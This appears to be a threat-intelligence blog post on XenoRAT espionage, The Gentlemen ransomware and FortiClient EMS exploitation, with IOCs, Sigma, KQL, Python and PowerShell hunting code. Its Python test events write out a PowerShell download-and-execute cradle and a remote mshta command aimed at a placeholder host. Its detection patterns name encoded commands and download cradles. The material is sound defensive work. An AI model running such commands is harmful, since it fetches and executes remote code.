
Operation XENOFISCAL & Storm-2697: XenoRAT, The Gentlemen RaaS, and FortiClient EMS Exploitation — OTX Pulse Intelligence

Security Arsenal Team
May 29, 2026
11 min read

Recent OTX pulse data covers three distinct campaigns running in parallel: one nation-state espionage operation and two aggressive cybercrime operations. The SideCopy APT (linked to Transparent Tribe) is targeting the Afghan Ministry of Finance with a persistent XenoRAT campaign dubbed "Operation XENOFISCAL." At the same time, the cybercrime ecosystem is expanding with the emergence of "The Gentlemen," a new RaaS operation (tracked as Storm-2697) built around a self-propagating Go-based encryptor, and with in-the-wild exploitation of FortiClient EMS servers (CVE-2026-35616) to deploy the EKZ Infostealer. Together these threats show high technical sophistication: abuse of trusted infrastructure (compromised .edu hosting and endpoint-management servers), self-propagation, and weaknesses in the endpoint-management supply chain.

Threat Summary

The current threat landscape is dominated by three distinct campaigns:

  1. APT Espionage (SideCopy/XenoRAT): A Pakistan-linked threat group is conducting a geopolitically motivated spear-phishing campaign against the Afghan Ministry of Finance. The objective is intelligence gathering and persistent access to government networks. The attack chain relies on social engineering (Pashto-language lures) and compromised legitimate infrastructure (a .edu.af domain) to deliver multi-stage loaders.

  2. Cybercrime-as-a-Service (The Gentlemen): A new RaaS operation offers affiliates a Go-based ransomware strain. Its key differentiators are aggressive self-propagation and a hybrid encryption scheme (Curve25519 key exchange, XChaCha20 file encryption), aimed at rapid, widespread network compromise across critical sectors such as healthcare and education. If the scheme is implemented correctly, files cannot be decrypted without the operator's private key, so recovery depends on offline backups and pre-encryption snapshots.

  3. Infrastructure Abuse (EKZ Infostealer): A critical vulnerability in FortiClient EMS (CVE-2026-35616) is being exploited in the wild. Attackers bypass authentication on the endpoint-management server and use its own deployment channel to push malicious payloads masquerading as security patches. The effect is a living-off-the-land attack at the management plane: a trusted security tool becomes the delivery and lateral-movement mechanism, and the malicious script arrives on endpoints with the same signals of legitimacy as a real patch.

Threat Actor / Malware Profile

SideCopy APT & XenoRAT

  • Distribution Method: Spear-phishing emails carrying malicious LNK files disguised as staff directories. The LNK executes mshta.exe, which fetches a remote HTA payload from a compromised Afghan education domain (abimj.edu.af).
  • Payload Behavior: The HTA acts as a multi-stage loader and ultimately deploys XenoRAT, a full-featured, open-source Remote Access Trojan.
  • C2 Communication: Connects to command and control (C2) infrastructure (e.g., 103.132.98.224) to receive commands and exfiltrate data.
  • Persistence Mechanism: The pulse describes persistence only generically; expect registry Run keys or scheduled tasks created by the HTA loader stage, both of which the hunt script in this post checks.
  • Anti-Analysis Techniques: Splits execution across a multi-stage chain (LNK -> mshta.exe -> HTA -> DLL/RAT) so that no single artifact looks malicious on static inspection, and a sandbox that does not follow the remote fetch never sees the final payload.

Storm-2697 & The Gentlemen RaaS

  • Distribution Method: Not specified in the pulse; initial access brokers or direct exploitation of exposed internet-facing services are the usual routes for a RaaS affiliate. Once inside, the encryptor's own self-propagation handles the spread.
  • Payload Behavior: A ransomware encryptor written in Go that encrypts files with a hybrid scheme: Curve25519 for key exchange and XChaCha20 for file encryption.
  • Self-Propagation: The encryptor spreads laterally across the network on its own, which distinguishes it from single-system encryptors that depend on the operator moving laterally by hand.
  • Persistence Mechanism: Not detailed in the pulse; WMI event subscriptions or scheduled tasks are the likely candidates.
  • Anti-Analysis Techniques: Written in Go: binaries are statically linked, large, and carry the Go runtime and calling convention, which slows analysts accustomed to C/C++ malware, although Go-aware disassembler plugins and symbol-recovery tools reduce the gap when symbols are stripped.

EKZ Infostealer & CVE-2026-35616

  • Distribution Method: Exploitation of CVE-2026-35616, an improper access control flaw in FortiClient EMS. Attackers bypass API authentication, issue privileged requests, and use the EMS deployment mechanism to push a malicious script to managed endpoints.
  • Payload Behavior: A PowerShell script disguised as a Fortinet patch, which downloads and executes the EKZ Infostealer. EKZ is designed to steal sensitive data from the infected endpoint.
  • C2 Communication: Connects to attacker-controlled servers to exfiltrate stolen credentials and data.
  • Persistence Mechanism: The malicious PowerShell script may establish persistence through scheduled tasks or registry Run keys; the pulse does not specify which.
  • Anti-Analysis Techniques: Runs as PowerShell launched by the endpoint-management agent, so its activity blends in with legitimate script deployments; inspect command lines for encoded commands and download cradles rather than relying on the parent process alone.

IOC Analysis

The pulses provide a mix of network and file-based IOCs that are useful for detection and containment.

  • Network Indicators:

    • IPv4: 103.132.98.224 (SideCopy XenoRAT C2). Block this IP at perimeter firewalls and alert on any outbound connection to it; XenoRAT C2 is typically a raw TCP session rather than HTTP, so match on destination IP in firewall and NetFlow data rather than in web-proxy logs alone.
    • Domain: abimj.edu.af. This compromised educational domain serves the HTA stage; blocking it breaks the chain before XenoRAT is downloaded. Because it belongs to a legitimate institution, treat the block as temporary and notify the owner where possible.
  • File Hashes (SHA256, MD5, SHA1): The pulses list hashes for the malicious LNK, HTA, and DLL files from the XenoRAT campaign, and for The Gentlemen ransomware and EKZ Infostealer binaries; import them into EDR to quarantine or alert on these files. Hashes catch only the exact samples already seen, so pair them with the behavioral rules in the Detection Engineering section.

  • CVEs:

    • CVE-2026-35616: Critical vulnerability in FortiClient EMS. This is a prime indicator for vulnerability scanning and patching prioritization.
    • CVE-2026-0300: A second vulnerability referenced in the EKZ Infostealer pulse, suggesting a possible exploitation chain or shared campaign infrastructure; confirm its relevance to your FortiClient EMS version before prioritizing it.

Operational Guidance for SOC Teams:

  1. Immediate Blocking: Add all IP and domain IOCs to your SIEM watchlists and to firewall and proxy blocklists. Automate the push from the pulse feed where possible, with validation so that malformed or private-range entries never reach a production blocklist.
  2. EDR Integration: Import all file hashes into your Endpoint Detection and Response (EDR) platform as "malicious" to trigger alerts for any execution or file creation events matching these hashes.
  3. Vulnerability Management: Prioritize patching for CVE-2026-35616 on all FortiClient EMS servers. Conduct a scan to identify any unpatched instances.
  4. Network Traffic Analysis: Use your network detection and response (NDR) tools to hunt for any traffic to the known C2 IP, HTTP or not, and for anomalous outbound data volumes from internal workstations.
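As an added example (not code from the original post, and not an OTX SDK), the following Python script shows steps 1 and 2 as one automated pipeline: it validates an indicator list in the shape of an OTX pulse export, groups indicators by the control that will consume them (firewall, DNS/proxy, EDR, vulnerability management), rejects entries that must never reach a blocklist, and matches the result against a few constructed log records. The pulse layout and the log field names are assumptions; the file hashes are placeholders derived from strings so that no real sample hash is invented here.

```python
import hashlib
import ipaddress
from collections import defaultdict

# OTX indicator type names assumed for the hash family; the length check rejects truncated hashes.
HASH_LENGTHS = {"FileHash-MD5": 32, "FileHash-SHA1": 40, "FileHash-SHA256": 64}

# Constructed sample in the shape of an OTX pulse export (not a real pulse download).
# The IP, domain and CVE are the ones discussed in this post; the hashes are placeholders.
SAMPLE_PULSE = {
    "name": "Operation XENOFISCAL / EKZ Infostealer (constructed sample)",
    "indicators": [
        {"indicator": "103.132.98.224", "type": "IPv4"},
        {"indicator": "abimj.edu.af", "type": "domain"},
        {"indicator": "CVE-2026-35616", "type": "CVE"},
        {"indicator": hashlib.sha256(b"constructed-sample-lnk").hexdigest(), "type": "FileHash-SHA256"},
        {"indicator": hashlib.md5(b"constructed-sample-hta").hexdigest(), "type": "FileHash-MD5"},
        {"indicator": "not-a-hash", "type": "FileHash-SHA1"},   # malformed entry, must be rejected
    ],
}


def normalize_indicators(pulse):
    """Group pulse indicators by consuming control. Malformed or unsafe entries land in
    'rejected' instead of being dropped silently, so the feed can be reviewed."""
    groups = defaultdict(set)
    for entry in pulse.get("indicators", []):
        value = str(entry.get("indicator", "")).strip()
        kind = entry.get("type", "")
        if kind == "IPv4":
            try:
                ip = ipaddress.ip_address(value)
            except ValueError:
                groups["rejected"].add(value)
                continue
            # Never push RFC1918/loopback addresses to a perimeter blocklist.
            if ip.is_private or ip.is_loopback:
                groups["rejected"].add(value)
                continue
            groups["ip"].add(str(ip))
        elif kind in ("domain", "hostname"):
            groups["domain"].add(value.lower().rstrip("."))
        elif kind in HASH_LENGTHS:
            v = value.lower()
            if len(v) == HASH_LENGTHS[kind] and all(c in "0123456789abcdef" for c in v):
                groups["hash"].add(v)
            else:
                groups["rejected"].add(value)
        elif kind == "CVE":
            groups["cve"].add(value.upper())
        else:
            groups["rejected"].add(value)
    return groups


def domain_matches(observed, blocked_domains):
    """Exact match or subdomain match only: 'www.abimj.edu.af' hits, 'notabimj.edu.af' does not."""
    observed = observed.lower().rstrip(".")
    return any(observed == d or observed.endswith("." + d) for d in blocked_domains)


def match_events(groups, events):
    """Return (event id, indicator kind, matched value) for each IOC hit across log records."""
    hits = []
    for ev in events:
        if ev.get("dst_ip") in groups["ip"]:
            hits.append((ev["id"], "ip", ev["dst_ip"]))
        for field in ("host", "query"):
            if field in ev and domain_matches(ev[field], groups["domain"]):
                hits.append((ev["id"], "domain", ev[field]))
        for field in ("sha256", "sha1", "md5"):
            if field in ev and ev[field].lower() in groups["hash"]:
                hits.append((ev["id"], "hash", ev[field]))
    return hits


# Constructed log records (firewall, DNS, EDR); not from any real environment.
SAMPLE_EVENTS = [
    {"id": "fw-1", "src_ip": "10.20.30.40", "dst_ip": "103.132.98.224"},
    {"id": "dns-1", "query": "www.abimj.edu.af"},
    {"id": "dns-2", "query": "notabimj.edu.af"},            # lookalike, must not match
    {"id": "edr-1", "sha256": hashlib.sha256(b"constructed-sample-lnk").hexdigest()},
    {"id": "fw-2", "src_ip": "10.20.30.41", "dst_ip": "198.51.100.7"},   # clean
]

if __name__ == "__main__":
    groups = normalize_indicators(SAMPLE_PULSE)
    for kind in ("ip", "domain", "hash", "cve", "rejected"):
        print(f"{kind:9s}", sorted(groups[kind]))
    for hit in match_events(groups, SAMPLE_EVENTS):
        print("[!] hit", hit)
```

The suffix-only domain comparison and the private-range rejection are the two checks most often missing from home-grown IOC pushes; the first avoids missing subdomains of the compromised host, the second avoids a feed entry taking an internal subnet offline.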

Detection Engineering


Sigma rules (process creation, FortiClient EMS API logs, Sysmon file events)

```yaml
title: SideCopy XenoRAT Malicious LNK and Mshta Execution Pattern
id: 9f04f4b4-2d9a-4951-b823-9e7e508f10e8
description: >
  Detects the execution pattern associated with the SideCopy XenoRAT campaign, where a
  malicious LNK file spawns mshta.exe to fetch a remote HTA payload. This is a key TTP in
  the Operation XENOFISCAL attack chain. mshta.exe launched from an LNK appears with
  explorer.exe as its parent (or cmd.exe/powershell.exe when the LNK target is a one-liner).
status: experimental
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d8/
  - https://attack.mitre.org/techniques/T1059/005/
date: 2026/05/29
modified: 2026/05/29
tags:
  - attack.execution
  - attack.t1059.005
  - attack.initial_access
  - attack.t1566.001
  - detection.emerging-threats
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\winword.exe'
      - '\excel.exe'
      - '\cmd.exe'
      - '\powershell.exe'
  selection_child:
    Image|endswith: '\mshta.exe'
    CommandLine|contains: '.hta'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate applications that launch mshta.exe to load a local HTA file. A remote http(s) URL in the command line deserves higher priority than a local path.
level: high
```


```yaml
title: FortiClient EMS Exploitation via CVE-2026-35616 API Abuse
id: 88eefc90-3db1-49c8-bc08-75c3dc2db28e
description: >
  Detects potential exploitation of CVE-2026-35616 on FortiClient EMS. Flags API POST
  requests that the server logs as unauthenticated (the core indicator of the bypass), and
  successful API calls from sources outside the trusted management console ranges; either
  indicates an attacker may be pushing malicious payloads through EMS. The logsource and
  field names assume an EMS API log forwarded to the SIEM; map them to your collector's
  schema before deploying.
status: experimental
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d9/
  - https://attack.mitre.org/techniques/T1190/
date: 2026/05/29
modified: 2026/05/29
tags:
  - attack.initial_access
  - attack.t1190
  - attack.execution
  - attack.t1059.001
  - cve.2026.35616
logsource:
  product: fortinet
  service: forticlient-ems
detection:
  selection_api:
    EventID: '4101'         # or the specific Event ID for API calls in your FortiClient EMS logs
    RequestMethod: 'POST'
    RequestURI|contains: '/api/'
  selection_unauthenticated:
    Authenticated: 'false'  # a request served without authentication is the key indicator of CVE-2026-35616
  selection_success:
    StatusCode: '200'
  filter_trusted_console:
    SourceIP|cidr:          # replace with your known, trusted EMS management console ranges
      - '10.0.0.0/8'
      - '192.168.0.0/16'
  # Unauthenticated requests are never suppressed by the source filter: an attacker with a
  # foothold inside the trusted ranges would otherwise be invisible to this rule.
  condition: selection_api and (selection_unauthenticated or (selection_success and not filter_trusted_console))
falsepositives:
  - Legitimate but unregistered automation or management hosts calling the API from outside the trusted ranges.
level: critical
```


```yaml
title: The Gentlemen RaaS Go-Based Ransomware Activity
id: 45f8e8a1-6d7c-4a2e-b883-56b194d6c58c
description: >
  Detects activity indicative of The Gentlemen ransomware, a Go-based encryptor: a single
  process creating a high number of user-document files in a short timeframe, a behavior
  consistent with aggressive self-propagating ransomware. The '\go-build' path check is a
  weak heuristic (it matches binaries launched via 'go run' rather than a compiled encryptor)
  and should be supplemented or replaced with the file hashes from the pulse.
status: experimental
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/65643f90e97f8f15c7d2f0d9/
  - https://attack.mitre.org/techniques/T1486/
date: 2026/05/29
modified: 2026/05/29
tags:
  - attack.impact
  - attack.t1486
  - malware.the_gentlemen
logsource:
  category: file_event
  product: windows
detection:
  selection_go_path:
    Image|contains: '\go-build'
  selection_mass_encryption:
    EventID: 11             # Sysmon FileCreate
    TargetFilename|contains:
      - '.docx'
      - '.xlsx'
      - '.pdf'
      - '.jpg'
      - '.png'
  timeframe: 1m
  condition: selection_go_path and selection_mass_encryption | count(TargetFilename) by ProcessId > 20
falsepositives:
  - Legitimate bulk file processing by a known application (e.g., a data migration tool). Tuning of the count threshold is required.
level: high
```

KQL — Microsoft Sentinel / Defender

```kql
// Hunt for SideCopy XenoRAT C2 communication and process chain
// Look for mshta.exe spawned from an LNK-style parent with an .hta argument
let XenoRATHunt =
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where InitiatingProcessFileName in~ ("explorer.exe", "winword.exe", "excel.exe", "cmd.exe", "powershell.exe")
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine has ".hta"
    | extend Hunt = "XenoRAT-mshta"
    | project Hunt, DeviceId, Timestamp, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName;
// Look for network connections to the known C2 IP (any protocol, not only HTTP)
let C2CommunicationHunt =
    DeviceNetworkEvents
    | where Timestamp > ago(7d)
    | where RemoteIP == "103.132.98.224"
    | extend Hunt = "XenoRAT-C2"
    | project Hunt, DeviceId, Timestamp, RemoteIP, RemotePort, InitiatingProcessFileName, AccountName;
// Hunt for EKZ Infostealer delivery: PowerShell launched by a FortiClient component whose
// command line references a "patch" AND uses an encoded command or a download cradle.
// The parentheses matter: "or" binds looser than "and", so without them any DownloadString
// invocation under these parents would match regardless of the "patch" term.
let EKZDeliveryHunt =
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where FileName =~ "powershell.exe"
    | where ProcessCommandLine has "patch" and ProcessCommandLine has_any ("-enc", "-encodedcommand", "DownloadString")
    | where InitiatingProcessFileName in~ ("FortiClientEMS.exe", "FortiESNAC.exe")   // confirm these parent names against your own EMS deployments
    | extend Hunt = "EKZ-delivery"
    | project Hunt, DeviceId, Timestamp, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName;
// Union all hunts for a comprehensive view
union XenoRATHunt, C2CommunicationHunt, EKZDeliveryHunt
| order by Timestamp desc
```
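To check the process-chain logic of the mshta and EKZ rules before deploying them, here is an added Python example (not from the original post or the pulses) that re-implements the two process-creation rules over constructed events. It keeps the parent allowlists of the rules above, makes the AND/OR precedence explicit, and scores a remote HTA higher than a local one. The URL hosts and file paths in the sample events are placeholders (example.invalid), not observed payload locations, and the FortiClient parent names are taken from the hunt above rather than verified telemetry.

```python
import re
from dataclasses import dataclass

# Parent images the mshta rule accepts: explorer.exe for a double-clicked LNK, cmd/powershell
# for LNKs whose target is a one-liner, Office for documents that carry the shortcut.
LNK_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "cmd.exe", "powershell.exe"}
# FortiClient component names as used by the KQL hunt; confirm against your own telemetry.
EMS_PARENTS = {"forticlientems.exe", "fortiesnac.exe"}
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    device: str
    parent: str    # InitiatingProcessFileName / ParentImage, basename only
    image: str     # FileName / Image, basename only
    cmdline: str


def rule_xenorat_mshta(ev: ProcEvent):
    """Sigma rule 1 / XenoRATHunt: mshta.exe from an LNK-style parent with an .hta argument.
    A remote http(s) HTA is the campaign's pattern and is scored higher than a local file."""
    if ev.image.lower() != "mshta.exe" or ev.parent.lower() not in LNK_PARENTS:
        return None
    if ".hta" not in ev.cmdline.lower():
        return None
    return "high" if REMOTE_HTA.search(ev.cmdline) else "medium"


def rule_ekz_delivery(ev: ProcEvent):
    """EKZDeliveryHunt with the precedence made explicit: PowerShell launched by a FortiClient
    component whose command line mentions 'patch' AND uses an encoded command or DownloadString."""
    if ev.image.lower() != "powershell.exe" or ev.parent.lower() not in EMS_PARENTS:
        return None
    cl = ev.cmdline.lower()
    if "patch" in cl and ("-enc" in cl or "downloadstring" in cl):
        return "critical"
    return None


RULES = {
    "SideCopy XenoRAT mshta": rule_xenorat_mshta,
    "EKZ delivery via EMS": rule_ekz_delivery,
}


def evaluate(events):
    """Return (device, rule name, severity) for every event/rule pair that matches."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            severity = rule(ev)
            if severity:
                findings.append((ev.device, name, severity))
    return findings


# Constructed process-creation events; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("ws-01", "explorer.exe", "mshta.exe", "mshta.exe http://example.invalid/staff.hta"),
    ProcEvent("ws-02", "explorer.exe", "mshta.exe", r"mshta.exe C:\Tools\legacy\setup.hta"),
    # Parent outside the allowlist: deliberately not matched, so the list is a tuning knob.
    ProcEvent("ws-03", "services.exe", "mshta.exe", "mshta.exe http://example.invalid/staff.hta"),
    ProcEvent("srv-01", "FortiESNAC.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/forti-patch.ps1')"),
    ProcEvent("srv-02", "FortiESNAC.exe", "powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for finding in evaluate(SAMPLE_EVENTS):
        print("[!]", *finding)
```

Event ws-03 shows the cost of the parent allowlist: a loader that launches mshta.exe from an unexpected parent is not caught. Widen LNK_PARENTS, or drop the parent condition and rely on the remote-URL check, if the extra noise is acceptable in your environment.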


```powershell
#Requires -RunAsAdministrator
# IOC Hunt Script for XenoRAT, EKZ Infostealer, and The Gentlemen Ransomware
# This script checks for specific registry keys, file paths, and network connections.
# Run with elevated privileges on a suspect endpoint.

# 1. Check for SideCopy XenoRAT persistence (Registry Run / RunOnce keys)
Write-Host "Checking for XenoRAT Persistence in Registry Run Keys..." -ForegroundColor Yellow
$RunPaths = @("HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
              "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
              "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
              "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce")
# Get-ItemProperty returns one object per path, so inspect each key's properties separately
foreach ($Path in $RunPaths) {
    $Props = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    if (-not $Props) { continue }
    foreach ($Key in $Props.PSObject.Properties) {
        if ($Key.Name -in @("PSPath","PSParentPath","PSChildName","PSDrive","PSProvider")) { continue }
        $Value = [string]$Key.Value
        # Check for mshta/HTA-based or encoded-PowerShell persistence (-e, -ec, -enc, -EncodedCommand)
        if ($Value -match "mshta" -or $Value -match "\.hta" -or $Value -match "powershell.*\s-e(c|nc|ncodedcommand)?\b") {
            Write-Host "[!] Suspicious Run Key found: ${Path}\$($Key.Name) = $Value" -ForegroundColor Red
        }
    }
}

# 2. Check for EKZ Infostealer-style PowerShell droppers in temp locations
Write-Host "Checking for EKZ Infostealer-related PowerShell Scripts..." -ForegroundColor Yellow
# When run elevated, $env:TEMP is the admin's own temp folder; sweep every profile's temp and the system temp
$TempPaths = @("C:\Windows\Temp") + (Get-ChildItem "C:\Users" -Directory -ErrorAction SilentlyContinue |
               ForEach-Object { Join-Path $_.FullName "AppData\Local\Temp" })
$PSFiles = Get-ChildItem -Path $TempPaths -Filter "*.ps1" -File -ErrorAction SilentlyContinue
foreach ($File in $PSFiles) {
    $Content = Get-Content $File.FullName -Raw -ErrorAction SilentlyContinue
    if ($Content -match "DownloadString|DownloadFile|Invoke-WebRequest" -and $Content -match "patch") {
        Write-Host "[!] Suspicious PowerShell file found: $($File.FullName)" -ForegroundColor Red
    }
}

# 3. Check for active network connections to known C2 IPs
Write-Host "Checking for active connections to known C2 IPs..." -ForegroundColor Yellow
$C2IPs = @("103.132.98.224")
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($Conn in ($Connections | Where-Object { $_.RemoteAddress -in $C2IPs })) {
    $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] Found connection to C2 IP $($Conn.RemoteAddress):$($Conn.RemotePort) from PID $($Conn.OwningProcess) ($($Process.ProcessName), $($Process.Path))" -ForegroundColor Red
}
# A clean result here only proves no session is open right now; check proxy/NetFlow history for past beacons

# 4. Check for The Gentlemen Ransomware file indicators (ransom notes in common drop paths)
Write-Host "Checking for common ransomware note/drop path..." -ForegroundColor Yellow
$RansomPaths = @("C:\Users\Public\Documents", "C:\Users\Public\Desktop", "C:\Users\*\Desktop")
$RansomFiles = Get-ChildItem -Path $RansomPaths -Filter "*.txt" -File -ErrorAction SilentlyContinue
foreach ($File in $RansomFiles) {
    if ($File.Name -match "readme|recover|decrypt|restore") {
        Write-Host "[!] Found potential ransom note: $($File.FullName)" -ForegroundColor Yellow
    }
}

Write-Host "Hunt complete. Review all [!] findings." -ForegroundColor Green
```


Response Priorities

*   **Immediate (0-4h):**
    *   **Block IOCs:** Immediately block all IP addresses and domains listed in the IOC Analysis section at your network perimeter and proxies.
    *   **Isolate Compromised Systems:** If a system is detected connecting to the SideCopy C2 IP (`103.132.98.224`) or shows evidence of EKZ Infostealer execution, isolate it from the network.
    *   **Patch FortiClient EMS:** Initiate an emergency patching cycle for CVE-2026-35616 on all FortiClient EMS servers. If patching is not immediately possible, restrict API access to known, trusted subnets.

*   **24h:**
    *   **Credential Reset:** If EKZ Infostealer is suspected or confirmed, prioritize resetting credentials for accounts that were logged into the infected endpoints, particularly those with privileged access.
    *   **Full Endpoint Scan:** Conduct a full, in-depth scan on all endpoints using the provided file hashes to detect any dormant malware.
    *   **Hunt for Persistence:** Use the PowerShell script or equivalent to broadly hunt for the persistence mechanisms described in the malware profiles across your fleet.

*   **1 Week:**
    *   **Architecture Hardening:** Implement microsegmentation to limit lateral movement capabilities, which would mitigate the self-propagation feature of The Gentlemen ransomware.
    *   **Enhance Email Filtering:** Update email security gateways to block or heavily sandbox LNK files and HTA attachments to prevent future SideCopy-style spear-phishing.
    *   **Endpoint Management Review:** Audit and harden the security posture of all endpoint management tools (like FortiClient EMS) to reduce the attack surface for similar API-based exploits.
